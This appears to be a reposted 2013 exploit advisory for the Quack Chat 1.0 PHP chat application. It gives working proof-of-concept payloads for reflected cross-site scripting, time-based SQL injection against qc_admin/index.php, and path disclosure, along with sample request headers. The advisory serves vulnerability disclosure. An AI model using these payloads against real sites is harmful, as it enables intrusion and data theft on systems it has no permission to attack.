Mayk0

#; Quack Chat 1.0 - Multiple Vulnerabilities

Aug 18th, 2013

Full title: Quack Chat 1.0 - Multiple Vulnerabilities

Date added: 2013-08-18
Category: web applications
Platform: php
Description:
Quack Chat version 1.0 suffers from cross-site scripting, path disclosure, and remote SQL injection vulnerabilities.
================================================================

###########################################################################################
# Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Disclosure
# Date: 15 August 2013
# Exploit Author: Dylan Irzi
# Credit goes to: websecuritydev.com
# Vendor Homepage: http://www.quack-chat.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.0
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev.
###########################################################################################

Cross Site Scripting:
Affected files:

qchat.php
qc_admin/index.php?p=history

PoC:
localhost/qchat.php
Vector: ""><img src=x onerror=prompt(/XSS/);>>

Input:
<input id="name" type="text" style="width:200px;" name="name">
Is reflected in: localhost/qc_admin/index.php?p=history

PoC #2:
localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
Example:
localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E

-------------------------------------------------------------------
SQL Injection

localhost/qc_admin/index.php?p=history&id=(SQL Injection)
localhost/qc_admin/index.php?p=history&page=(SQL Injection)

# Exploit-DB note: Here's a PoC:
# <server>/qc_admin/index.php?p=history&id=1 and sleep(10)

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e

(Replace with a valid session cookie)

-------------------------------------------------------------------
Path Disclosure

localhost/qc_admin/index.php?p=history&id='

in /var/www/chat/qc_admin/index.php on line 249

--------------------------------------------------------------------